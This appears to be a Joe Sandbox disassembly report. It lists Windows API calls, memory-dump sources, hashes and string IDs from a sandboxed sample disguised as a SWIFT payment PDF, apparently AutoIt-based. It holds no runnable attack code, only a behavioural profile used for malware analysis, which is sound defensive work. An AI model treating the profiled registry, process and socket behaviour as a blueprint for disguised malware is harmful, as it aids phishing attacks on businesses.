• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: ca07675f3d88338831b28d1a721d1a9a8a77b84f0913a627ea5c2a817b30f86f
• Instruction ID: 36eb11c0d1b9e75631b23aa3faab749cd889043f5fdd64cb0a95e7743d2e0d40
• Opcode Fuzzy Hash: ca07675f3d88338831b28d1a721d1a9a8a77b84f0913a627ea5c2a817b30f86f
• Instruction Fuzzy Hash: 0F51F5A09087D53DFB3287748C55BB6BFADAF06304F08C489F5D55A8C2D698EE84E760
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 2945705084-0
                                                                                    • Opcode ID: af09ed026013a15cbeecc684587cc4c73d417cebad842dca93d28d7fc50bf0b0
                                                                                    • Instruction ID: f102c73159de8bab264fbe377fe09ed95295fba97d7a5198f698d5a7da0901b7
                                                                                    • Opcode Fuzzy Hash: af09ed026013a15cbeecc684587cc4c73d417cebad842dca93d28d7fc50bf0b0
                                                                                    • Instruction Fuzzy Hash: 42417C66C24214B6CB11EBF4C88AECFB3ACAF85710F508966E518E3121FA35E65487A5
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00983DA1
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00983DCB
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00983E80
                                                                                      • Part of subcall function 00983D72: RegCloseKey.ADVAPI32(?), ref: 00983DE8
                                                                                      • Part of subcall function 00983D72: FreeLibrary.KERNEL32(?), ref: 00983E3A
                                                                                      • Part of subcall function 00983D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00983E5D
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00983E25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: 1354fb37305fc648003b634d349f048431477262265fdaee05755f33767f2cf3
                                                                                    • Instruction ID: 208f06324aa91b76159247d9494702f8dc3ad579a22e576a043c69c1680559d4
                                                                                    • Opcode Fuzzy Hash: 1354fb37305fc648003b634d349f048431477262265fdaee05755f33767f2cf3
                                                                                    • Instruction Fuzzy Hash: 2F313AB1915119BFDB14AF90DC89AFFB7BCEF09700F00416AE512E2251E6749F899BA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00988FE7
                                                                                    • GetWindowLongW.USER32(00FE7DC0,000000F0), ref: 0098901A
                                                                                    • GetWindowLongW.USER32(00FE7DC0,000000F0), ref: 0098904F
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00989081
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009890AB
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009890BC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009890D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 16345e4dbc3a136f7e50906c9d78900c267094fda10285b3574ce20dc8b5e7b2
                                                                                    • Instruction ID: b01f15e5da4da58d8c93236d6abd9210ddd7f7de73acbdb8e455658c9cdf81e2
                                                                                    • Opcode Fuzzy Hash: 16345e4dbc3a136f7e50906c9d78900c267094fda10285b3574ce20dc8b5e7b2
                                                                                    • Instruction Fuzzy Hash: A6313675618215EFDB21DF58DC84F6537A9FB4A714F180164F61A8F2B1CBB1AC40EB81
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009608F2
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00960918
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0096091B
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00960939
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00960942
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00960967
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00960975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 956abb0e0348f663bc435e5cc17d33e3e380baabbdaac422ed8c97bce63d35f6
                                                                                    • Instruction ID: a11f41c49adbcdda3ccd3f9f1609324810249bed0f42c7d63bc4f4a2d629e656
                                                                                    • Opcode Fuzzy Hash: 956abb0e0348f663bc435e5cc17d33e3e380baabbdaac422ed8c97bce63d35f6
                                                                                    • Instruction Fuzzy Hash: 1521A776605219AFAB109F78CCC8DBB73ECEF49360B008525F919DB2A1D674EC45DBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: f9528b9413b7d3f9e98e6ee6b66be40a44f35386f2fdb4eb0124c5b816257e00
                                                                                    • Instruction ID: 93d2d3cde7a206a1bccb200c427a778caf7de56276113f84852ef7a71f649ba3
                                                                                    • Opcode Fuzzy Hash: f9528b9413b7d3f9e98e6ee6b66be40a44f35386f2fdb4eb0124c5b816257e00
                                                                                    • Instruction Fuzzy Hash: DA218E72648A11B7C334AB34DC12FBB73ACEFE5310F50442AF44B97181EB659982C395
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009609CB
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009609F1
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 009609F4
                                                                                    • SysAllocString.OLEAUT32 ref: 00960A15
                                                                                    • SysFreeString.OLEAUT32 ref: 00960A1E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00960A38
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00960A46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 1e5d6a611e6b5127240b61e05fec9b0404e4fd3be01820b2189b64984ab0e8a6
                                                                                    • Instruction ID: c019dbce0f5039bf7380c1c321bb965153b00313e333e4d95a94f56f08c8896a
                                                                                    • Opcode Fuzzy Hash: 1e5d6a611e6b5127240b61e05fec9b0404e4fd3be01820b2189b64984ab0e8a6
                                                                                    • Instruction Fuzzy Hash: BC217175615204AFDB10DFE8DCC8DAB77ECEF493A07008125F909CB2A1E674EC419B64
                                                                                    APIs
                                                                                      • Part of subcall function 0093D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                      • Part of subcall function 0093D17C: GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                      • Part of subcall function 0093D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0098A32D
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0098A33A
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0098A345
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0098A354
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0098A360
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 7bcc5837111873f438db50634617ddd74894a598b388da8535e4b7ce895377c9
                                                                                    • Instruction ID: 222449b060cae983fe7648bf483b25a9ad17f9b537f5c433ee699dc368709c5f
                                                                                    • Opcode Fuzzy Hash: 7bcc5837111873f438db50634617ddd74894a598b388da8535e4b7ce895377c9
                                                                                    • Instruction Fuzzy Hash: 8411D0B1150219BFEF105FA0CC85EEB7F6DFF08798F014116BA08A61A0C6729C21DBA4
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 0093CCF6
                                                                                    • GetWindowRect.USER32(?,?), ref: 0093CD37
                                                                                    • ScreenToClient.USER32(?,?), ref: 0093CD5F
                                                                                    • GetClientRect.USER32(?,?), ref: 0093CE8C
                                                                                    • GetWindowRect.USER32(?,?), ref: 0093CEA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                    • String ID:
                                                                                    • API String ID: 1296646539-0
                                                                                    • Opcode ID: 58dd29ae6e1055fa08bd95347fc960f43844f7e31c627a921d0df558622a47d2
                                                                                    • Instruction ID: 8f75f4bcec4b2427dcd2d9992adef59bb92d2989f197fddc2216eab32aa7b136
                                                                                    • Opcode Fuzzy Hash: 58dd29ae6e1055fa08bd95347fc960f43844f7e31c627a921d0df558622a47d2
                                                                                    • Instruction Fuzzy Hash: E5B137B9900649DBDF20CFA8C4807EEBBB5FF08300F149529EC69AB254DB34AD50DB64
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00981C18
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00981C26
                                                                                    • __wsplitpath.LIBCMT ref: 00981C54
                                                                                      • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
                                                                                    • _wcscat.LIBCMT ref: 00981C69
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00981CDF
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00981CF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1380811348-0
                                                                                    • Opcode ID: cb198bc6980a77a264852189131f8382fc0758f3783614193d7eb406520f2735
                                                                                    • Instruction ID: 7c710f51689c59d772d14a38df135432e4bd9d575dd7a9e2c778c77863fca082
                                                                                    • Opcode Fuzzy Hash: cb198bc6980a77a264852189131f8382fc0758f3783614193d7eb406520f2735
                                                                                    • Instruction Fuzzy Hash: E9513DB15083509FD724EF24D885FABB7ECEF88754F00491EF58A97291DB709905CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009830AF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009830EF
                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00983112
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0098313B
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0098317E
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0098318B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                    • String ID:
                                                                                    • API String ID: 3451389628-0
                                                                                    • Opcode ID: 749c5035db74279d8c0dc38f63d148ecc7c9c9cf14666902234ba78d0c1cc713
                                                                                    • Instruction ID: 26ddbacb241eb5060bb4878e05c53828f83992b90161926ef5d65fd110878533
                                                                                    • Opcode Fuzzy Hash: 749c5035db74279d8c0dc38f63d148ecc7c9c9cf14666902234ba78d0c1cc713
                                                                                    • Instruction Fuzzy Hash: 7B514871208310AFC704EF64D895E6EBBE9FF89700F04891DF595872A1DB71EA05CB92
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 00988540
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00988577
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0098859F
                                                                                    • GetMenuItemID.USER32(?,?), ref: 0098860E
                                                                                    • GetSubMenu.USER32(?,?), ref: 0098861C
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0098866D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                    • String ID:
                                                                                    • API String ID: 650687236-0
                                                                                    • Opcode ID: 3a0bab8ced037c0edf7d4cb5468c89b9c313ab2bdebb271a5ce4faf30b0011f2
                                                                                    • Instruction ID: a03c879559d79ce64cd1b26474479d3ae39d7fa54ad3267f161b30e59c5b53b5
                                                                                    • Opcode Fuzzy Hash: 3a0bab8ced037c0edf7d4cb5468c89b9c313ab2bdebb271a5ce4faf30b0011f2
                                                                                    • Instruction Fuzzy Hash: 7C519071E00225AFCF11EF54C845AAEB7F8EF88310F104499F916BB351DB30AE418BA0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00964B10
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00964B5B
                                                                                    • IsMenu.USER32(00000000), ref: 00964B7B
                                                                                    • CreatePopupMenu.USER32 ref: 00964BAF
                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00964C0D
                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00964C3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3311875123-0
                                                                                    • Opcode ID: 913bce0f7c45b715457ee16b617db15b986051abc879947493d03ac1572f0e75
                                                                                    • Instruction ID: 7a9e88e9765345cec02b605e355193d6d31051979bf8f739d20b2fa1ce0f3260
                                                                                    • Opcode Fuzzy Hash: 913bce0f7c45b715457ee16b617db15b986051abc879947493d03ac1572f0e75
                                                                                    • Instruction Fuzzy Hash: 0E51E070A02309EFDF25CFA8C888BEEBBF8AF45318F144159E4959B291E7749944CB51
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,009BDC00), ref: 00978E7C
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978E89
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00978EAD
                                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00978EC5
                                                                                    • _strlen.LIBCMT ref: 00978EF7
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978F6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_strlenselect
                                                                                    • String ID:
                                                                                    • API String ID: 2217125717-0
                                                                                    • Opcode ID: 3791321f3cc4c4c0e37c5e38d8604ad429d27bf237df673232f485722a015cc1
                                                                                    • Instruction ID: dc5f2373ff767eaf3665139b572a49e19cdc034af241e216637891b3df5fedda
                                                                                    • Opcode Fuzzy Hash: 3791321f3cc4c4c0e37c5e38d8604ad429d27bf237df673232f485722a015cc1
                                                                                    • Instruction Fuzzy Hash: 6341A472600104AFCB14EBA4DD99FAEB7BDAF98310F108559F51A972D1DF30AE40CBA0
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • BeginPaint.USER32(?,?,?), ref: 0093AC2A
                                                                                    • GetWindowRect.USER32(?,?), ref: 0093AC8E
                                                                                    • ScreenToClient.USER32(?,?), ref: 0093ACAB
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0093ACBC
                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0093AD06
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0099E673
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 2592858361-0
                                                                                    • Opcode ID: 6beca596afa0845c6df4343c5c1eb5e927127d535e3690f484c24baf1e05378d
                                                                                    • Instruction ID: 0c2e10a4cf0a9286c468679bcfb9a8c6dce69418b133fc439fe3b34e7e0b66a6
                                                                                    • Opcode Fuzzy Hash: 6beca596afa0845c6df4343c5c1eb5e927127d535e3690f484c24baf1e05378d
                                                                                    • Instruction Fuzzy Hash: F941A1701092009FCB11DF28CC84FBA7BA8FF5A720F040669F9A58B2A1D7359D45EF62
                                                                                    APIs
                                                                                    • ShowWindow.USER32(009E1628,00000000,009E1628,00000000,00000000,009E1628,?,0099DC5D,00000000,?,00000000,00000000,00000000,?,0099DAD1,00000004), ref: 0098E40B
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0098E42F
                                                                                    • ShowWindow.USER32(009E1628,00000000), ref: 0098E48F
                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0098E4A1
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0098E4C5
                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0098E4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
